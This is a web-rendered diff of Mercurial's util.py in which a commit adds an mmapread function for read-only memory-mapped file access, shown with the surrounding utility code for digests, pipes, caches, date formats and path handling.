##// END OF EJS Templates
util: add an mmapread method...
Mark Thomas -
r34296:3bb2a9f2 default
parent child Browse files
Show More
@@ -1,3769 +1,3781
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 import mmap
29 30 import os
30 31 import platform as pyplatform
31 32 import re as remod
32 33 import shutil
33 34 import signal
34 35 import socket
35 36 import stat
36 37 import string
37 38 import subprocess
38 39 import sys
39 40 import tempfile
40 41 import textwrap
41 42 import time
42 43 import traceback
43 44 import warnings
44 45 import zlib
45 46
46 47 from . import (
47 48 encoding,
48 49 error,
49 50 i18n,
50 51 policy,
51 52 pycompat,
52 53 )
53 54
54 55 base85 = policy.importmod(r'base85')
55 56 osutil = policy.importmod(r'osutil')
56 57 parsers = policy.importmod(r'parsers')
57 58
58 59 b85decode = base85.b85decode
59 60 b85encode = base85.b85encode
60 61
61 62 cookielib = pycompat.cookielib
62 63 empty = pycompat.empty
63 64 httplib = pycompat.httplib
64 65 httpserver = pycompat.httpserver
65 66 pickle = pycompat.pickle
66 67 queue = pycompat.queue
67 68 socketserver = pycompat.socketserver
68 69 stderr = pycompat.stderr
69 70 stdin = pycompat.stdin
70 71 stdout = pycompat.stdout
71 72 stringio = pycompat.stringio
72 73 urlerr = pycompat.urlerr
73 74 urlreq = pycompat.urlreq
74 75 xmlrpclib = pycompat.xmlrpclib
75 76
76 77 # workaround for win32mbcs
77 78 _filenamebytestr = pycompat.bytestr
78 79
79 80 def isatty(fp):
80 81 try:
81 82 return fp.isatty()
82 83 except AttributeError:
83 84 return False
84 85
85 86 # glibc determines buffering on first write to stdout - if we replace a TTY
86 87 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 88 # buffering
88 89 if isatty(stdout):
89 90 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 91
91 92 if pycompat.osname == 'nt':
92 93 from . import windows as platform
93 94 stdout = platform.winstdout(stdout)
94 95 else:
95 96 from . import posix as platform
96 97
97 98 _ = i18n._
98 99
99 100 bindunixsocket = platform.bindunixsocket
100 101 cachestat = platform.cachestat
101 102 checkexec = platform.checkexec
102 103 checklink = platform.checklink
103 104 copymode = platform.copymode
104 105 executablepath = platform.executablepath
105 106 expandglobs = platform.expandglobs
106 107 explainexit = platform.explainexit
107 108 findexe = platform.findexe
108 109 gethgcmd = platform.gethgcmd
109 110 getuser = platform.getuser
110 111 getpid = os.getpid
111 112 groupmembers = platform.groupmembers
112 113 groupname = platform.groupname
113 114 hidewindow = platform.hidewindow
114 115 isexec = platform.isexec
115 116 isowner = platform.isowner
116 117 listdir = osutil.listdir
117 118 localpath = platform.localpath
118 119 lookupreg = platform.lookupreg
119 120 makedir = platform.makedir
120 121 nlinks = platform.nlinks
121 122 normpath = platform.normpath
122 123 normcase = platform.normcase
123 124 normcasespec = platform.normcasespec
124 125 normcasefallback = platform.normcasefallback
125 126 openhardlinks = platform.openhardlinks
126 127 oslink = platform.oslink
127 128 parsepatchoutput = platform.parsepatchoutput
128 129 pconvert = platform.pconvert
129 130 poll = platform.poll
130 131 popen = platform.popen
131 132 posixfile = platform.posixfile
132 133 quotecommand = platform.quotecommand
133 134 readpipe = platform.readpipe
134 135 rename = platform.rename
135 136 removedirs = platform.removedirs
136 137 samedevice = platform.samedevice
137 138 samefile = platform.samefile
138 139 samestat = platform.samestat
139 140 setbinary = platform.setbinary
140 141 setflags = platform.setflags
141 142 setsignalhandler = platform.setsignalhandler
142 143 shellquote = platform.shellquote
143 144 spawndetached = platform.spawndetached
144 145 split = platform.split
145 146 sshargs = platform.sshargs
146 147 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 148 statisexec = platform.statisexec
148 149 statislink = platform.statislink
149 150 testpid = platform.testpid
150 151 umask = platform.umask
151 152 unlink = platform.unlink
152 153 username = platform.username
153 154
154 155 try:
155 156 recvfds = osutil.recvfds
156 157 except AttributeError:
157 158 pass
158 159 try:
159 160 setprocname = osutil.setprocname
160 161 except AttributeError:
161 162 pass
162 163
163 164 # Python compatibility
164 165
165 166 _notset = object()
166 167
167 168 # disable Python's problematic floating point timestamps (issue4836)
168 169 # (Python hypocritically says you shouldn't change this behavior in
169 170 # libraries, and sure enough Mercurial is not a library.)
170 171 os.stat_float_times(False)
171 172
172 173 def safehasattr(thing, attr):
173 174 return getattr(thing, attr, _notset) is not _notset
174 175
175 176 def bytesinput(fin, fout, *args, **kwargs):
176 177 sin, sout = sys.stdin, sys.stdout
177 178 try:
178 179 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 180 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 181 finally:
181 182 sys.stdin, sys.stdout = sin, sout
182 183
183 184 def bitsfrom(container):
184 185 bits = 0
185 186 for bit in container:
186 187 bits |= bit
187 188 return bits
188 189
189 190 # python 2.6 still have deprecation warning enabled by default. We do not want
190 191 # to display anything to standard user so detect if we are running test and
191 192 # only use python deprecation warning in this case.
192 193 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 194 if _dowarn:
194 195 # explicitly unfilter our warning for python 2.7
195 196 #
196 197 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 198 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 199 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
199 200 # makes the whole PYTHONWARNINGS thing useless for our usecase.
200 201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203 204
204 205 def nouideprecwarn(msg, version, stacklevel=1):
205 206 """Issue an python native deprecation warning
206 207
207 208 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
208 209 """
209 210 if _dowarn:
210 211 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
211 212 " update your code.)") % version
212 213 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
213 214
214 215 DIGESTS = {
215 216 'md5': hashlib.md5,
216 217 'sha1': hashlib.sha1,
217 218 'sha512': hashlib.sha512,
218 219 }
219 220 # List of digest types from strongest to weakest
220 221 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
221 222
222 223 for k in DIGESTS_BY_STRENGTH:
223 224 assert k in DIGESTS
224 225
225 226 class digester(object):
226 227 """helper to compute digests.
227 228
228 229 This helper can be used to compute one or more digests given their name.
229 230
230 231 >>> d = digester([b'md5', b'sha1'])
231 232 >>> d.update(b'foo')
232 233 >>> [k for k in sorted(d)]
233 234 ['md5', 'sha1']
234 235 >>> d[b'md5']
235 236 'acbd18db4cc2f85cedef654fccc4a4d8'
236 237 >>> d[b'sha1']
237 238 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
238 239 >>> digester.preferred([b'md5', b'sha1'])
239 240 'sha1'
240 241 """
241 242
242 243 def __init__(self, digests, s=''):
243 244 self._hashes = {}
244 245 for k in digests:
245 246 if k not in DIGESTS:
246 247 raise Abort(_('unknown digest type: %s') % k)
247 248 self._hashes[k] = DIGESTS[k]()
248 249 if s:
249 250 self.update(s)
250 251
251 252 def update(self, data):
252 253 for h in self._hashes.values():
253 254 h.update(data)
254 255
255 256 def __getitem__(self, key):
256 257 if key not in DIGESTS:
257 258 raise Abort(_('unknown digest type: %s') % k)
258 259 return self._hashes[key].hexdigest()
259 260
260 261 def __iter__(self):
261 262 return iter(self._hashes)
262 263
263 264 @staticmethod
264 265 def preferred(supported):
265 266 """returns the strongest digest type in both supported and DIGESTS."""
266 267
267 268 for k in DIGESTS_BY_STRENGTH:
268 269 if k in supported:
269 270 return k
270 271 return None
271 272
272 273 class digestchecker(object):
273 274 """file handle wrapper that additionally checks content against a given
274 275 size and digests.
275 276
276 277 d = digestchecker(fh, size, {'md5': '...'})
277 278
278 279 When multiple digests are given, all of them are validated.
279 280 """
280 281
281 282 def __init__(self, fh, size, digests):
282 283 self._fh = fh
283 284 self._size = size
284 285 self._got = 0
285 286 self._digests = dict(digests)
286 287 self._digester = digester(self._digests.keys())
287 288
288 289 def read(self, length=-1):
289 290 content = self._fh.read(length)
290 291 self._digester.update(content)
291 292 self._got += len(content)
292 293 return content
293 294
294 295 def validate(self):
295 296 if self._size != self._got:
296 297 raise Abort(_('size mismatch: expected %d, got %d') %
297 298 (self._size, self._got))
298 299 for k, v in self._digests.items():
299 300 if v != self._digester[k]:
300 301 # i18n: first parameter is a digest name
301 302 raise Abort(_('%s mismatch: expected %s, got %s') %
302 303 (k, v, self._digester[k]))
303 304
304 305 try:
305 306 buffer = buffer
306 307 except NameError:
307 308 def buffer(sliceable, offset=0, length=None):
308 309 if length is not None:
309 310 return memoryview(sliceable)[offset:offset + length]
310 311 return memoryview(sliceable)[offset:]
311 312
312 313 closefds = pycompat.osname == 'posix'
313 314
314 315 _chunksize = 4096
315 316
316 317 class bufferedinputpipe(object):
317 318 """a manually buffered input pipe
318 319
319 320 Python will not let us use buffered IO and lazy reading with 'polling' at
320 321 the same time. We cannot probe the buffer state and select will not detect
321 322 that data are ready to read if they are already buffered.
322 323
323 324 This class let us work around that by implementing its own buffering
324 325 (allowing efficient readline) while offering a way to know if the buffer is
325 326 empty from the output (allowing collaboration of the buffer with polling).
326 327
327 328 This class lives in the 'util' module because it makes use of the 'os'
328 329 module from the python stdlib.
329 330 """
330 331
331 332 def __init__(self, input):
332 333 self._input = input
333 334 self._buffer = []
334 335 self._eof = False
335 336 self._lenbuf = 0
336 337
337 338 @property
338 339 def hasbuffer(self):
339 340 """True is any data is currently buffered
340 341
341 342 This will be used externally a pre-step for polling IO. If there is
342 343 already data then no polling should be set in place."""
343 344 return bool(self._buffer)
344 345
345 346 @property
346 347 def closed(self):
347 348 return self._input.closed
348 349
349 350 def fileno(self):
350 351 return self._input.fileno()
351 352
352 353 def close(self):
353 354 return self._input.close()
354 355
355 356 def read(self, size):
356 357 while (not self._eof) and (self._lenbuf < size):
357 358 self._fillbuffer()
358 359 return self._frombuffer(size)
359 360
360 361 def readline(self, *args, **kwargs):
361 362 if 1 < len(self._buffer):
362 363 # this should not happen because both read and readline end with a
363 364 # _frombuffer call that collapse it.
364 365 self._buffer = [''.join(self._buffer)]
365 366 self._lenbuf = len(self._buffer[0])
366 367 lfi = -1
367 368 if self._buffer:
368 369 lfi = self._buffer[-1].find('\n')
369 370 while (not self._eof) and lfi < 0:
370 371 self._fillbuffer()
371 372 if self._buffer:
372 373 lfi = self._buffer[-1].find('\n')
373 374 size = lfi + 1
374 375 if lfi < 0: # end of file
375 376 size = self._lenbuf
376 377 elif 1 < len(self._buffer):
377 378 # we need to take previous chunks into account
378 379 size += self._lenbuf - len(self._buffer[-1])
379 380 return self._frombuffer(size)
380 381
381 382 def _frombuffer(self, size):
382 383 """return at most 'size' data from the buffer
383 384
384 385 The data are removed from the buffer."""
385 386 if size == 0 or not self._buffer:
386 387 return ''
387 388 buf = self._buffer[0]
388 389 if 1 < len(self._buffer):
389 390 buf = ''.join(self._buffer)
390 391
391 392 data = buf[:size]
392 393 buf = buf[len(data):]
393 394 if buf:
394 395 self._buffer = [buf]
395 396 self._lenbuf = len(buf)
396 397 else:
397 398 self._buffer = []
398 399 self._lenbuf = 0
399 400 return data
400 401
401 402 def _fillbuffer(self):
402 403 """read data to the buffer"""
403 404 data = os.read(self._input.fileno(), _chunksize)
404 405 if not data:
405 406 self._eof = True
406 407 else:
407 408 self._lenbuf += len(data)
408 409 self._buffer.append(data)
409 410
411 def mmapread(fp):
412 try:
413 fd = getattr(fp, 'fileno', lambda: fp)()
414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 except ValueError:
416 # Empty files cannot be mmapped, but mmapread should still work. Check
417 # if the file is empty, and if so, return an empty buffer.
418 if os.fstat(fd).st_size == 0:
419 return ''
420 raise
421
410 422 def popen2(cmd, env=None, newlines=False):
411 423 # Setting bufsize to -1 lets the system decide the buffer size.
412 424 # The default for bufsize is 0, meaning unbuffered. This leads to
413 425 # poor performance on Mac OS X: http://bugs.python.org/issue4194
414 426 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
415 427 close_fds=closefds,
416 428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
417 429 universal_newlines=newlines,
418 430 env=env)
419 431 return p.stdin, p.stdout
420 432
421 433 def popen3(cmd, env=None, newlines=False):
422 434 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
423 435 return stdin, stdout, stderr
424 436
425 437 def popen4(cmd, env=None, newlines=False, bufsize=-1):
426 438 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
427 439 close_fds=closefds,
428 440 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 441 stderr=subprocess.PIPE,
430 442 universal_newlines=newlines,
431 443 env=env)
432 444 return p.stdin, p.stdout, p.stderr, p
433 445
434 446 def version():
435 447 """Return version information if available."""
436 448 try:
437 449 from . import __version__
438 450 return __version__.version
439 451 except ImportError:
440 452 return 'unknown'
441 453
442 454 def versiontuple(v=None, n=4):
443 455 """Parses a Mercurial version string into an N-tuple.
444 456
445 457 The version string to be parsed is specified with the ``v`` argument.
446 458 If it isn't defined, the current Mercurial version string will be parsed.
447 459
448 460 ``n`` can be 2, 3, or 4. Here is how some version strings map to
449 461 returned values:
450 462
451 463 >>> v = b'3.6.1+190-df9b73d2d444'
452 464 >>> versiontuple(v, 2)
453 465 (3, 6)
454 466 >>> versiontuple(v, 3)
455 467 (3, 6, 1)
456 468 >>> versiontuple(v, 4)
457 469 (3, 6, 1, '190-df9b73d2d444')
458 470
459 471 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
460 472 (3, 6, 1, '190-df9b73d2d444+20151118')
461 473
462 474 >>> v = b'3.6'
463 475 >>> versiontuple(v, 2)
464 476 (3, 6)
465 477 >>> versiontuple(v, 3)
466 478 (3, 6, None)
467 479 >>> versiontuple(v, 4)
468 480 (3, 6, None, None)
469 481
470 482 >>> v = b'3.9-rc'
471 483 >>> versiontuple(v, 2)
472 484 (3, 9)
473 485 >>> versiontuple(v, 3)
474 486 (3, 9, None)
475 487 >>> versiontuple(v, 4)
476 488 (3, 9, None, 'rc')
477 489
478 490 >>> v = b'3.9-rc+2-02a8fea4289b'
479 491 >>> versiontuple(v, 2)
480 492 (3, 9)
481 493 >>> versiontuple(v, 3)
482 494 (3, 9, None)
483 495 >>> versiontuple(v, 4)
484 496 (3, 9, None, 'rc+2-02a8fea4289b')
485 497 """
486 498 if not v:
487 499 v = version()
488 500 parts = remod.split('[\+-]', v, 1)
489 501 if len(parts) == 1:
490 502 vparts, extra = parts[0], None
491 503 else:
492 504 vparts, extra = parts
493 505
494 506 vints = []
495 507 for i in vparts.split('.'):
496 508 try:
497 509 vints.append(int(i))
498 510 except ValueError:
499 511 break
500 512 # (3, 6) -> (3, 6, None)
501 513 while len(vints) < 3:
502 514 vints.append(None)
503 515
504 516 if n == 2:
505 517 return (vints[0], vints[1])
506 518 if n == 3:
507 519 return (vints[0], vints[1], vints[2])
508 520 if n == 4:
509 521 return (vints[0], vints[1], vints[2], extra)
510 522
511 523 # used by parsedate
512 524 defaultdateformats = (
513 525 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
514 526 '%Y-%m-%dT%H:%M', # without seconds
515 527 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
516 528 '%Y-%m-%dT%H%M', # without seconds
517 529 '%Y-%m-%d %H:%M:%S', # our common legal variant
518 530 '%Y-%m-%d %H:%M', # without seconds
519 531 '%Y-%m-%d %H%M%S', # without :
520 532 '%Y-%m-%d %H%M', # without seconds
521 533 '%Y-%m-%d %I:%M:%S%p',
522 534 '%Y-%m-%d %H:%M',
523 535 '%Y-%m-%d %I:%M%p',
524 536 '%Y-%m-%d',
525 537 '%m-%d',
526 538 '%m/%d',
527 539 '%m/%d/%y',
528 540 '%m/%d/%Y',
529 541 '%a %b %d %H:%M:%S %Y',
530 542 '%a %b %d %I:%M:%S%p %Y',
531 543 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
532 544 '%b %d %H:%M:%S %Y',
533 545 '%b %d %I:%M:%S%p %Y',
534 546 '%b %d %H:%M:%S',
535 547 '%b %d %I:%M:%S%p',
536 548 '%b %d %H:%M',
537 549 '%b %d %I:%M%p',
538 550 '%b %d %Y',
539 551 '%b %d',
540 552 '%H:%M:%S',
541 553 '%I:%M:%S%p',
542 554 '%H:%M',
543 555 '%I:%M%p',
544 556 )
545 557
546 558 extendeddateformats = defaultdateformats + (
547 559 "%Y",
548 560 "%Y-%m",
549 561 "%b",
550 562 "%b %Y",
551 563 )
552 564
553 565 def cachefunc(func):
554 566 '''cache the result of function calls'''
555 567 # XXX doesn't handle keywords args
556 568 if func.__code__.co_argcount == 0:
557 569 cache = []
558 570 def f():
559 571 if len(cache) == 0:
560 572 cache.append(func())
561 573 return cache[0]
562 574 return f
563 575 cache = {}
564 576 if func.__code__.co_argcount == 1:
565 577 # we gain a small amount of time because
566 578 # we don't need to pack/unpack the list
567 579 def f(arg):
568 580 if arg not in cache:
569 581 cache[arg] = func(arg)
570 582 return cache[arg]
571 583 else:
572 584 def f(*args):
573 585 if args not in cache:
574 586 cache[args] = func(*args)
575 587 return cache[args]
576 588
577 589 return f
578 590
579 591 class sortdict(collections.OrderedDict):
580 592 '''a simple sorted dictionary
581 593
582 594 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
583 595 >>> d2 = d1.copy()
584 596 >>> d2
585 597 sortdict([('a', 0), ('b', 1)])
586 598 >>> d2.update([(b'a', 2)])
587 599 >>> list(d2.keys()) # should still be in last-set order
588 600 ['b', 'a']
589 601 '''
590 602
591 603 def __setitem__(self, key, value):
592 604 if key in self:
593 605 del self[key]
594 606 super(sortdict, self).__setitem__(key, value)
595 607
596 608 if pycompat.ispypy:
597 609 # __setitem__() isn't called as of PyPy 5.8.0
598 610 def update(self, src):
599 611 if isinstance(src, dict):
600 612 src = src.iteritems()
601 613 for k, v in src:
602 614 self[k] = v
603 615
604 616 class transactional(object):
605 617 """Base class for making a transactional type into a context manager."""
606 618 __metaclass__ = abc.ABCMeta
607 619
608 620 @abc.abstractmethod
609 621 def close(self):
610 622 """Successfully closes the transaction."""
611 623
612 624 @abc.abstractmethod
613 625 def release(self):
614 626 """Marks the end of the transaction.
615 627
616 628 If the transaction has not been closed, it will be aborted.
617 629 """
618 630
619 631 def __enter__(self):
620 632 return self
621 633
622 634 def __exit__(self, exc_type, exc_val, exc_tb):
623 635 try:
624 636 if exc_type is None:
625 637 self.close()
626 638 finally:
627 639 self.release()
628 640
629 641 @contextlib.contextmanager
630 642 def acceptintervention(tr=None):
631 643 """A context manager that closes the transaction on InterventionRequired
632 644
633 645 If no transaction was provided, this simply runs the body and returns
634 646 """
635 647 if not tr:
636 648 yield
637 649 return
638 650 try:
639 651 yield
640 652 tr.close()
641 653 except error.InterventionRequired:
642 654 tr.close()
643 655 raise
644 656 finally:
645 657 tr.release()
646 658
647 659 @contextlib.contextmanager
648 660 def nullcontextmanager():
649 661 yield
650 662
651 663 class _lrucachenode(object):
652 664 """A node in a doubly linked list.
653 665
654 666 Holds a reference to nodes on either side as well as a key-value
655 667 pair for the dictionary entry.
656 668 """
657 669 __slots__ = (u'next', u'prev', u'key', u'value')
658 670
659 671 def __init__(self):
660 672 self.next = None
661 673 self.prev = None
662 674
663 675 self.key = _notset
664 676 self.value = None
665 677
666 678 def markempty(self):
667 679 """Mark the node as emptied."""
668 680 self.key = _notset
669 681
670 682 class lrucachedict(object):
671 683 """Dict that caches most recent accesses and sets.
672 684
673 685 The dict consists of an actual backing dict - indexed by original
674 686 key - and a doubly linked circular list defining the order of entries in
675 687 the cache.
676 688
677 689 The head node is the newest entry in the cache. If the cache is full,
678 690 we recycle head.prev and make it the new head. Cache accesses result in
679 691 the node being moved to before the existing head and being marked as the
680 692 new head node.
681 693 """
682 694 def __init__(self, max):
683 695 self._cache = {}
684 696
685 697 self._head = head = _lrucachenode()
686 698 head.prev = head
687 699 head.next = head
688 700 self._size = 1
689 701 self._capacity = max
690 702
691 703 def __len__(self):
692 704 return len(self._cache)
693 705
694 706 def __contains__(self, k):
695 707 return k in self._cache
696 708
697 709 def __iter__(self):
698 710 # We don't have to iterate in cache order, but why not.
699 711 n = self._head
700 712 for i in range(len(self._cache)):
701 713 yield n.key
702 714 n = n.next
703 715
704 716 def __getitem__(self, k):
705 717 node = self._cache[k]
706 718 self._movetohead(node)
707 719 return node.value
708 720
709 721 def __setitem__(self, k, v):
710 722 node = self._cache.get(k)
711 723 # Replace existing value and mark as newest.
712 724 if node is not None:
713 725 node.value = v
714 726 self._movetohead(node)
715 727 return
716 728
717 729 if self._size < self._capacity:
718 730 node = self._addcapacity()
719 731 else:
720 732 # Grab the last/oldest item.
721 733 node = self._head.prev
722 734
723 735 # At capacity. Kill the old entry.
724 736 if node.key is not _notset:
725 737 del self._cache[node.key]
726 738
727 739 node.key = k
728 740 node.value = v
729 741 self._cache[k] = node
730 742 # And mark it as newest entry. No need to adjust order since it
731 743 # is already self._head.prev.
732 744 self._head = node
733 745
734 746 def __delitem__(self, k):
735 747 node = self._cache.pop(k)
736 748 node.markempty()
737 749
738 750 # Temporarily mark as newest item before re-adjusting head to make
739 751 # this node the oldest item.
740 752 self._movetohead(node)
741 753 self._head = node.next
742 754
743 755 # Additional dict methods.
744 756
745 757 def get(self, k, default=None):
746 758 try:
747 759 return self._cache[k].value
748 760 except KeyError:
749 761 return default
750 762
751 763 def clear(self):
752 764 n = self._head
753 765 while n.key is not _notset:
754 766 n.markempty()
755 767 n = n.next
756 768
757 769 self._cache.clear()
758 770
759 771 def copy(self):
760 772 result = lrucachedict(self._capacity)
761 773 n = self._head.prev
762 774 # Iterate in oldest-to-newest order, so the copy has the right ordering
763 775 for i in range(len(self._cache)):
764 776 result[n.key] = n.value
765 777 n = n.prev
766 778 return result
767 779
768 780 def _movetohead(self, node):
769 781 """Mark a node as the newest, making it the new head.
770 782
771 783 When a node is accessed, it becomes the freshest entry in the LRU
772 784 list, which is denoted by self._head.
773 785
774 786 Visually, let's make ``N`` the new head node (* denotes head):
775 787
776 788 previous/oldest <-> head <-> next/next newest
777 789
778 790 ----<->--- A* ---<->-----
779 791 | |
780 792 E <-> D <-> N <-> C <-> B
781 793
782 794 To:
783 795
784 796 ----<->--- N* ---<->-----
785 797 | |
786 798 E <-> D <-> C <-> B <-> A
787 799
788 800 This requires the following moves:
789 801
790 802 C.next = D (node.prev.next = node.next)
791 803 D.prev = C (node.next.prev = node.prev)
792 804 E.next = N (head.prev.next = node)
793 805 N.prev = E (node.prev = head.prev)
794 806 N.next = A (node.next = head)
795 807 A.prev = N (head.prev = node)
796 808 """
797 809 head = self._head
798 810 # C.next = D
799 811 node.prev.next = node.next
800 812 # D.prev = C
801 813 node.next.prev = node.prev
802 814 # N.prev = E
803 815 node.prev = head.prev
804 816 # N.next = A
805 817 # It is tempting to do just "head" here, however if node is
806 818 # adjacent to head, this will do bad things.
807 819 node.next = head.prev.next
808 820 # E.next = N
809 821 node.next.prev = node
810 822 # A.prev = N
811 823 node.prev.next = node
812 824
813 825 self._head = node
814 826
815 827 def _addcapacity(self):
816 828 """Add a node to the circular linked list.
817 829
818 830 The new node is inserted before the head node.
819 831 """
820 832 head = self._head
821 833 node = _lrucachenode()
822 834 head.prev.next = node
823 835 node.prev = head.prev
824 836 node.next = head
825 837 head.prev = node
826 838 self._size += 1
827 839 return node
828 840
829 841 def lrucachefunc(func):
830 842 '''cache most recent results of function calls'''
831 843 cache = {}
832 844 order = collections.deque()
833 845 if func.__code__.co_argcount == 1:
834 846 def f(arg):
835 847 if arg not in cache:
836 848 if len(cache) > 20:
837 849 del cache[order.popleft()]
838 850 cache[arg] = func(arg)
839 851 else:
840 852 order.remove(arg)
841 853 order.append(arg)
842 854 return cache[arg]
843 855 else:
844 856 def f(*args):
845 857 if args not in cache:
846 858 if len(cache) > 20:
847 859 del cache[order.popleft()]
848 860 cache[args] = func(*args)
849 861 else:
850 862 order.remove(args)
851 863 order.append(args)
852 864 return cache[args]
853 865
854 866 return f
855 867
856 868 class propertycache(object):
857 869 def __init__(self, func):
858 870 self.func = func
859 871 self.name = func.__name__
860 872 def __get__(self, obj, type=None):
861 873 result = self.func(obj)
862 874 self.cachevalue(obj, result)
863 875 return result
864 876
865 877 def cachevalue(self, obj, value):
866 878 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
867 879 obj.__dict__[self.name] = value
868 880
869 881 def pipefilter(s, cmd):
870 882 '''filter string S through command CMD, returning its output'''
871 883 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
872 884 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
873 885 pout, perr = p.communicate(s)
874 886 return pout
875 887
876 888 def tempfilter(s, cmd):
877 889 '''filter string S through a pair of temporary files with CMD.
878 890 CMD is used as a template to create the real command to be run,
879 891 with the strings INFILE and OUTFILE replaced by the real names of
880 892 the temporary files generated.'''
881 893 inname, outname = None, None
882 894 try:
883 895 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
884 896 fp = os.fdopen(infd, pycompat.sysstr('wb'))
885 897 fp.write(s)
886 898 fp.close()
887 899 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
888 900 os.close(outfd)
889 901 cmd = cmd.replace('INFILE', inname)
890 902 cmd = cmd.replace('OUTFILE', outname)
891 903 code = os.system(cmd)
892 904 if pycompat.sysplatform == 'OpenVMS' and code & 1:
893 905 code = 0
894 906 if code:
895 907 raise Abort(_("command '%s' failed: %s") %
896 908 (cmd, explainexit(code)))
897 909 return readfile(outname)
898 910 finally:
899 911 try:
900 912 if inname:
901 913 os.unlink(inname)
902 914 except OSError:
903 915 pass
904 916 try:
905 917 if outname:
906 918 os.unlink(outname)
907 919 except OSError:
908 920 pass
909 921
910 922 filtertable = {
911 923 'tempfile:': tempfilter,
912 924 'pipe:': pipefilter,
913 925 }
914 926
915 927 def filter(s, cmd):
916 928 "filter a string through a command that transforms its input to its output"
917 929 for name, fn in filtertable.iteritems():
918 930 if cmd.startswith(name):
919 931 return fn(s, cmd[len(name):].lstrip())
920 932 return pipefilter(s, cmd)
921 933
922 934 def binary(s):
923 935 """return true if a string is binary data"""
924 936 return bool(s and '\0' in s)
925 937
926 938 def increasingchunks(source, min=1024, max=65536):
927 939 '''return no less than min bytes per chunk while data remains,
928 940 doubling min after each chunk until it reaches max'''
929 941 def log2(x):
930 942 if not x:
931 943 return 0
932 944 i = 0
933 945 while x:
934 946 x >>= 1
935 947 i += 1
936 948 return i - 1
937 949
938 950 buf = []
939 951 blen = 0
940 952 for chunk in source:
941 953 buf.append(chunk)
942 954 blen += len(chunk)
943 955 if blen >= min:
944 956 if min < max:
945 957 min = min << 1
946 958 nmin = 1 << log2(blen)
947 959 if nmin > min:
948 960 min = nmin
949 961 if min > max:
950 962 min = max
951 963 yield ''.join(buf)
952 964 blen = 0
953 965 buf = []
954 966 if buf:
955 967 yield ''.join(buf)
956 968
957 969 Abort = error.Abort
958 970
959 971 def always(fn):
960 972 return True
961 973
962 974 def never(fn):
963 975 return False
964 976
965 977 def nogc(func):
966 978 """disable garbage collector
967 979
968 980 Python's garbage collector triggers a GC each time a certain number of
969 981 container objects (the number being defined by gc.get_threshold()) are
970 982 allocated even when marked not to be tracked by the collector. Tracking has
971 983 no effect on when GCs are triggered, only on what objects the GC looks
972 984 into. As a workaround, disable GC while building complex (huge)
973 985 containers.
974 986
975 987 This garbage collector issue have been fixed in 2.7. But it still affect
976 988 CPython's performance.
977 989 """
978 990 def wrapper(*args, **kwargs):
979 991 gcenabled = gc.isenabled()
980 992 gc.disable()
981 993 try:
982 994 return func(*args, **kwargs)
983 995 finally:
984 996 if gcenabled:
985 997 gc.enable()
986 998 return wrapper
987 999
988 1000 if pycompat.ispypy:
989 1001 # PyPy runs slower with gc disabled
990 1002 nogc = lambda x: x
991 1003
992 1004 def pathto(root, n1, n2):
993 1005 '''return the relative path from one place to another.
994 1006 root should use os.sep to separate directories
995 1007 n1 should use os.sep to separate directories
996 1008 n2 should use "/" to separate directories
997 1009 returns an os.sep-separated path.
998 1010
999 1011 If n1 is a relative path, it's assumed it's
1000 1012 relative to root.
1001 1013 n2 should always be relative to root.
1002 1014 '''
1003 1015 if not n1:
1004 1016 return localpath(n2)
1005 1017 if os.path.isabs(n1):
1006 1018 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1007 1019 return os.path.join(root, localpath(n2))
1008 1020 n2 = '/'.join((pconvert(root), n2))
1009 1021 a, b = splitpath(n1), n2.split('/')
1010 1022 a.reverse()
1011 1023 b.reverse()
1012 1024 while a and b and a[-1] == b[-1]:
1013 1025 a.pop()
1014 1026 b.pop()
1015 1027 b.reverse()
1016 1028 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1017 1029
1018 1030 def mainfrozen():
1019 1031 """return True if we are a frozen executable.
1020 1032
